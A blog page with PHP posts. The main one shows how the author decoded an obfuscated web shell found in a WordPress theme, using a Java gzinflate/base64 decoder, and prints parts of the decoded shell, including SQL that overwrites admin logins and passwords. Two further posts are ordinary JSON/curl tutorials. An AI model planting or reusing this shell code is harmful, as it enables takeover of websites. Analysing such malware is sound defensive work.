PHP Posts

How to Decode PHP’s gzinflate and base64_decode using Java

This morning i found a very weird script on one of my wordpress website, looks like someone has uploaded a malicious script into my wordpress’ theme folder.

It looks like some PHP script, but decoded using base64 and compressed using gzinflate functions. I try to decode the malicious script using PHP but my PHP knowledge is very little. So im using Java instead.

This is what the malicious script looks like :

<?php eval(gzinflate(base64_decode('7H35m9rItejPd75v/gfSmRvb10uztpvx2Ak7Er 
...bla bla bla.... RGpn/Aw==')));?>

Because i couldnt find a proper tools to decode it, so i create my own java class to decode this malicious PHP script.
Here is my java class

package base64decoder;

import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.util.Scanner;
import java.util.zip.Inflater;
import java.util.zip.InflaterInputStream;
import org.apache.commons.codec.binary.Base64;

public class GZipAndBase64Decoder {

    public static void main(String[] args) throws Exception {
        Scanner scanner = new Scanner(new File("coded.txt"));
        String isi = scanner.nextLine();
        InputStream inflInstream = new InflaterInputStream(
                new ByteArrayInputStream(new Base64().decode(isi)),
                new Inflater(true));
        byte bytes[] = new byte[4096];
        
        FileOutputStream fileOutputStream = new FileOutputStream(new File("decoded.txt"));
        
        while (true) {
            int length = inflInstream.read(bytes, 0, 4096);
            if (length == -1) {
                break;
            }
            fileOutputStream.write(bytes, 0, length);            
        }
        fileOutputStream.flush();
        fileOutputStream.close();
    }
}

Create a file “coded.txt” and copy-pasted your encoded + gzinflate script to that file. But remember, only copy the highlighted part

<?php eval(gzinflate(base64_decode('
MALICIOUS SCRIPT
')));?>

you will find the decoded script on file “decoded.txt”. This is what the decoded PHP script looks like

error_reporting(0);
@set_time_limit(0);
@session_start();
// configuration
$xSoftware = trim(getenv("SERVER_SOFTWARE"));
// server name
$xServerName = $_SERVER["HTTP_HOST"];
$xName = "BlackAsu";
$masukin = "892ab763f02795bfa28354ef1d39059f";  //cange you password (hash md5) 
$nikmatin = (md5($_POST['pass']));
$crotzz = 1;  // ' 0 '  no login pass
if($nikmatin == $masukin){
	$_SESSION['login'] = "$nikmatin";
}
if($crotzz){
	if(!isset($_SESSION['login']) or $_SESSION['login'] != $masukin){
		die("
// bla bla bla bla (im too lazy to copy paste the whole script		

Use this script if you want to decode plain un-gzinflate Base64 script

package base64decoder;

import java.io.File;
import java.io.FileOutputStream;
import java.util.Scanner;
import org.apache.commons.codec.binary.Base64;

public class Base64Decoder {

    public static void main(String[] args) throws Exception {
        Scanner scanner = new Scanner(new File("coded2.txt"));
        String isi = scanner.nextLine();
        
        FileOutputStream fileOutputStream = new FileOutputStream(new File("decoded2.txt"));
        fileOutputStream.write(new String(new Base64().decode(isi)).getBytes());
        fileOutputStream.flush();
        fileOutputStream.close();
    }
}

im using Apache Common Codec to handle Base64 encoding-decoding

And btw, take a look at some part of the malicious script

echo "<FORM method='POST'>
<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
<input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
<input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
<input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
<tr><td>&nbsp;&nbsp;User baru</td><td>
<input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
 <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;

<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
</td></tr> </table><br><br><br><br>
";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$pwd   = $_POST['pwd'];
$admin = $_POST['admin'];

 @mysql_connect($localhost,$username,$password) or die(mysql_error());
 @mysql_select_db($database) or die(mysql_error());

$hash = crypt($pwd);
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());


if($a4s){
echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
}

Okay, so today’s wise word is, dont forget to change your wordpress’ table prefix :p

Google+

How to Simulate JSon POST Request Using PHP and CURL

Basically, im trying to do a PHP POST request using JSon string as its format and able to consume JSon array string as responses. Dont forget to activate CURL in your php.ini file.

<?php

//set POST variables address and json string
$url = 'http://localhost:81/dudu.php';
$fields = array(
		'userName'=>'yyy@xxx.com',
		'password'=>'yyyy',
		'emailProvider'=>'xxxx'
                );
//{"userName":"yyy@xxx.com","password":"yyyy","emailProvider":"xxxx"}

//url-ify the data for the JSON POST
$fields_string = json_encode($fields);

//open connection
$ch = curl_init();

//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_POST,count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER , 1);

//execute post
$jsonResult = curl_exec($ch);

//close connection
curl_close($ch);

// [{"name":0,"email":"yyy@xxx.com"},{"name":1,"email":"yyy@xxx.com"},
// {"name":2,"email":"yyy@xxx.com"},{"name":3,"email":"yyy@xxx.com"}]
$results = json_decode($jsonResult, true);
foreach ( $results as $result )
{
    echo "name : {$result['name']} and email {$result['email']} <br />";
}

?>

This is what my browser will look like after im testing my JSon POST

Have fun with CURL :-)

Google+

How to Handle JSon POST Request Using PHP

On my last project, i need to create a php service using JSon to handle service requests from multiple clients. My PHP file would consume JSon string for its requests and produce JSon string as its responses.
Im not too familiar with PHP, but after sometime googling i’ve found a workaround. This is how i do it.

<?php
// JSon request format is : 
// {"userName":"654321@zzzz.com","password":"12345","emailProvider":"zzzz"}

// read JSon input
$data_back = json_decode(file_get_contents('php://input'));

// set json string to php variables
$userName = $data_back->{"userName"};
$password = $data_back->{"password"};
$emailProvider = $data_back->{"emailProvider"};

// create json response
$responses = array();
for ($i = 0; $i < 10; $i++) {
    $responses[] = array("name" => $i, "email" => $userName . " " . $password . " " . $emailProvider);
}

// JSon response format is : 
// [{"name":"eeee","email":"eee@zzzzz.com"},
// {"name":"aaaa","email":"aaaaa@zzzzz.com"},{"name":"cccc","email":"bbb@zzzzz.com"}]

// set header as json
header("Content-type: application/json");

// send response
echo json_encode($responses);
?>

This is the http header and body of request and response.

Hope it help others, have fun with JSon. ;-)

Google+